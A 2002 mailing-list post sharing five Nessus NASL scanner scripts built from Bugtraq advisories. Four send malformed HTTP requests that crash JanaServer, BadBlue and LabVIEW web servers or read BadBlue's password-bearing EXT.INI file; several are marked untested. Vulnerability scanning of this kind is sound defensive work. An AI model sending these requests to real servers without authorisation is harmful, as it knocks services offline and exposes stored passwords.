
A few new NASL scripts
I think that they are correct (i.e. they implement what was described in the
advisories), but I do not guarantee that they are really useful (i.e.
that the advisory was right).




#
# This script was written by Michel Arboi <arboi@bigfoot.com>
# GPL
# *untested*
#
# References:
# Date: Fri, 26 Jul 2002 12:12:45 +0400
# From: "3APA3A" <3APA3A@SECURITY.NNOV.RU>
# To: bugtraq@securityfocus.com
# Subject: SECURITY.NNOV: multiple vulnerabilities in JanaServer
#
# Affected:
# JanaServer 2.2.1 and prior
# JanaServer 1.46 and prior
#


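if(description)
{
#script_id(TBD);
script_version ("$Revision$");
name["english"] = "HTTP version number overflow";
script_name(english:name["english"]);

# Text reported to the user when the server dies.
# (The string used to be terminated by ");" - an unmatched parenthesis.)
desc["english"] = "It was possible to kill the web server by
sending an invalid GET request with a too long HTTP version field

A cracker may exploit this vulnerability to make your web server
crash continually or even execute arbitrary code on your system.

Workaround : upgrade your software or protect it with a filtering reverse proxy

Risk factor : High";

script_description(english:desc["english"]);

summary["english"] = "too long HTTP version kills the web server";
script_summary(english:summary["english"]);

# The check crashes the target, hence a dangerous category.
script_category(ACT_DESTRUCTIVE_ATTACK);

script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
family["english"] = "Denial of Service";
script_family(english:family["english"]);
# Have the web server found and identified before Services/www is read
# from the knowledge base.
script_dependencie("find_service.nes", "http_version.nasl");
script_require_ports("Services/www", 80);
exit(0);
}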

########

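if (safe_checks()) exit(0);

port = get_kb_item("Services/www");
if(!port) port = 80;
if(! get_port_state(port)) exit(0);

soc = http_open_socket(port);
if(! soc) exit(0);

# Request whose HTTP version field is 2048 filler bytes long instead of "1.0".
req = string("GET / HTTP/", crap(2048), ".O\r\n\r\n");
send(socket:soc, data: req);
# Drain whatever the server answers; only its survival matters.
rep = recv(socket:soc, length:4096);
close(soc);

sleep(1);

# A live server may still be busy with the oversized request: give it a few
# chances to accept a new connection before declaring it dead (one failed
# connect right after the request is a false-positive risk).
alive = 0;
for (attempt = 0; attempt < 3 && ! alive; attempt = attempt + 1)
{
  soc = open_sock_tcp(port);
  if (soc) { alive = 1; close(soc); }
  else sleep(1);
}
if (! alive) security_hole(port);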




# This script was written by Michel Arboi <arboi@bigfoot.com>
# GPL
#
# References:
# Date: Mon, 11 Mar 2002 12:46:06 +0700
# From: "Fyodor" <fyarochkin@trusecure.com>
# To: bugtraq@securityfocus.com
# Subject: SunSolve CD cgi scripts...
#
# Date: Sat, 16 Jun 2001 23:24:45 +0700
# From: Fyodor <fyodor@relaygroup.com>
# To: security-alert@sun.com
# Subject: SunSolve CD security problems..
#

if(description)
{
#script_id(TBD);
script_version("$Revision$");

script_name(english:"SunSolve CD CGI user input validation");

# Report text; the check only looks for the CGI, it never drives it.
script_description(english:"
Sunsolve CD CGI scripts does not validate user input.
Crackers may use them to execute some commands on your system.

** Note: Nessus did not try to perform the attack.

Risk factor : High");

script_summary(english:"SunSolve CD CGI scripts are vulnerable to a few user
input validation problems");

script_category(ACT_ATTACK);
script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
script_family(english:"CGI abuses");
# The web server must be found and fingerprinted before Services/www is read.
script_dependencie("find_service.nes", "http_version.nasl");
script_require_ports("Services/www", 8383);
exit(0);
}

#
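port = get_kb_item("Services/www");
if(!port) port = 8383;
# Like the other web checks, stop if the port is not open.
if(! get_port_state(port)) exit(0);

# Absolute path used by the SunSolve CD web server.
if (is_cgi_installed(port: port, item:"/cd-cgi/sscd_suncourier.pl")) {
  # Presence only, the script is not exercised: report as a warning.
  security_warning(port);
  exit(0);
}

# Bare name: presumably is_cgi_installed() then searches the known
# CGI directories - confirm against the engine's implementation.
if (is_cgi_installed(port: port, item:"sscd_suncourier.pl")) {
  security_warning(port);
  exit(0);
}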








#
# This script was written by Michel Arboi <arboi@bigfoot.com>
# GPL
# *untested*
#
# References:
# From: "Matthew Murphy" <mattmurphy@kc.rr.com>
# To: full-disclosure@lists.netsys.com,
# "SecurITeam News" <news@securiteam.com>, bugtraq@securityfocus.com
# Subject: Three BadBlue Vulnerabilities
# Date: Fri, 12 Jul 2002 19:50:16 -0500
#

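if(description)
{
#script_id(TBD);
script_version ("$Revision$");
name["english"] = "BadBlue invalid GET DoS";
script_name(english:name["english"]);

# Text reported to the user when the server dies.
# (The string used to be terminated by ");" - an unmatched parenthesis.)
desc["english"] = "It was possible to kill the web server by
sending an invalid GET request (without any URI)

A cracker may exploit this vulnerability to make your web server
crash continually.

Workaround : upgrade your software or protect it with a filtering reverse proxy

Risk factor : Low";

script_description(english:desc["english"]);

summary["english"] = "Invalid GET kills the BadBlue web server";
script_summary(english:summary["english"]);

# Denial-of-service test: runs in the DoS phase.
script_category(ACT_DENIAL);

script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
family["english"] = "Denial of Service";
script_family(english:family["english"]);
# Have the web server found and identified before Services/www is read
# from the knowledge base.
script_dependencie("find_service.nes", "http_version.nasl");
script_require_ports("Services/www", 80);
exit(0);
}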

########

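if (safe_checks()) exit(0);

port = get_kb_item("Services/www");
if(!port)port = 80;
if(! get_port_state(port)) exit(0);

# Request line without any URI; the advisory says this kills BadBlue.
# A single buffer: the two requests sent below are byte-identical.
req = string("GET HTTP/1.0\r\n\r\n");

soc = http_open_socket(port);
if(! soc) exit(0);

# Send the malformed request twice; after each one, check that the
# server still accepts a connection and report if it does not.
for (i = 0; i < 2; i = i + 1)
{
  send(socket:soc, data: req);
  # Drain the reply, if any; its content is irrelevant.
  r = recv(socket:soc, length:1024);
  close(soc);

  sleep(1);

  # A live server may just be slow to accept again: retry a few times
  # before declaring it dead (one failed connect is a false-positive risk).
  alive = 0;
  for (attempt = 0; attempt < 3 && ! alive; attempt = attempt + 1)
  {
    soc = open_sock_tcp(port);
    if (soc) alive = 1;
    else sleep(1);
  }
  if (! alive) { security_hole(port); exit(0); }
}
close(soc);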




#
# This script was written by Michel Arboi <arboi@bigfoot.com>
# GPL
# *untested*
#
# References:
# From: "Matthew Murphy" <mattmurphy@kc.rr.com>
# To: full-disclosure@lists.netsys.com,
# "SecurITeam News" <news@securiteam.com>, bugtraq@securityfocus.com
# Subject: Three BadBlue Vulnerabilities
# Date: Fri, 12 Jul 2002 19:50:16 -0500
#

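if(description)
{
#script_id(TBD);
script_version ("$Revision$");
name["english"] = "BadBlue invalid null byte vulnerability";
script_name(english:name["english"]);

# Text reported to the user when the file could be read.
# (The string used to be terminated by ");" - an unmatched parenthesis.)
desc["english"] = "It was possible to read the content of /EXT.INI
(BadBlue configuration file) by sending an invalid GET request.

A cracker may exploit this vulnerability to steal the passwords.


Workaround : upgrade your software or protect it with a filtering reverse proxy

Risk factor : Medium";

script_description(english:desc["english"]);

summary["english"] = "Read BadBlue protected configuration file";
script_summary(english:summary["english"]);

# This check reads a file, it does not crash the server: it is an attack,
# not a denial of service (same category as the other "CGI abuses" check).
script_category(ACT_ATTACK);

script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
family["english"] = "CGI abuses";
script_family(english:family["english"]);
# Have the web server found and identified before Services/www is read
# from the knowledge base.
script_dependencie("find_service.nes", "http_version.nasl");
script_require_ports("Services/www", 80);
exit(0);
}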

########

# The invalid GET request described in the advisory.
# NOTE(review): the space inside the path may be a mail-archive artefact -
# compare with the advisory before relying on this check.
req = string("GET /ext.ini.% 00.txt HTTP/1.0\r\n\r\n");

port = get_kb_item("Services/www");
if(!port) port = 80;
if(! get_port_state(port)) exit(0);

soc = http_open_socket(port);
if(! soc) exit(0);

send(socket:soc, data: req);
# Only the status line of the reply is examined.
status = recv_line(socket:soc, length:1024);
close(soc);

# NOTE(review): a 200 status alone is a weak signal; a server that answers
# every request with 200 (custom error pages) would be flagged as well.
if (" 200 " >< status) security_hole(port);



#
# This script was written by Michel Arboi <arboi@bigfoot.com>
# GPL
# *untested*
#
# References:
# From: "Steve Zins" <steve@iLabVIEW.com>
# To: bugtraq@securityfocus.com
# Subject: LabVIEW Web Server DoS Vulnerability
# Date: Mon, 22 Apr 2002 22:51:39 -0700
#

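if(description)
{
#script_id(TBD);
script_version ("$Revision$");
name["english"] = "LabView web server DoS";
script_name(english:name["english"]);

# Text reported to the user when the server dies.
# (The string used to be terminated by ");" - an unmatched parenthesis.)
desc["english"] = "It was possible to kill the web server by
sending a request that ends with two LF characters instead of
the normal sequence CR LF CR LF
(CR = carriage return, LF = line feed).

A cracker may exploit this vulnerability to make this server and
all LabViews applications crash continually.

Workaround : upgrade your LabView software or run the web server with logging
disabled

Risk factor : Low";

script_description(english:desc["english"]);

summary["english"] = "Kills the LabView web server";
script_summary(english:summary["english"]);

# Denial-of-service test: runs in the DoS phase.
script_category(ACT_DENIAL);

script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
family["english"] = "Denial of Service";
script_family(english:family["english"]);
# Have the web server found and identified before Services/www is read
# from the knowledge base.
script_dependencie("find_service.nes", "http_version.nasl");
script_require_ports("Services/www", 80);
exit(0);
}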

########

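if (safe_checks()) exit(0);

port = get_kb_item("Services/www");
if(!port)port = 80;
# Guard clauses instead of nested ifs, like the other DoS checks.
if(! get_port_state(port)) exit(0);

soc = http_open_socket(port);
if(! soc) exit(0);

# Request terminated by a bare LF LF instead of CR LF CR LF; the advisory
# reports that this kills the LabVIEW web server.
req = string("GET / HTTP/1.0\n\n");
send(socket:soc, data:req);
# Drain the reply; only whether the server survives matters.
r = recv(socket:soc, length:1024);
close(soc);

sleep(1);

# A live server may still be busy: give it a few chances to accept a new
# connection before declaring it dead (one failed connect right after the
# request is a false-positive risk).
alive = 0;
for (attempt = 0; attempt < 3 && ! alive; attempt = attempt + 1)
{
  soc2 = open_sock_tcp(port);
  if (soc2) { alive = 1; close(soc2); }
  else sleep(1);
}
if (! alive) security_hole(port);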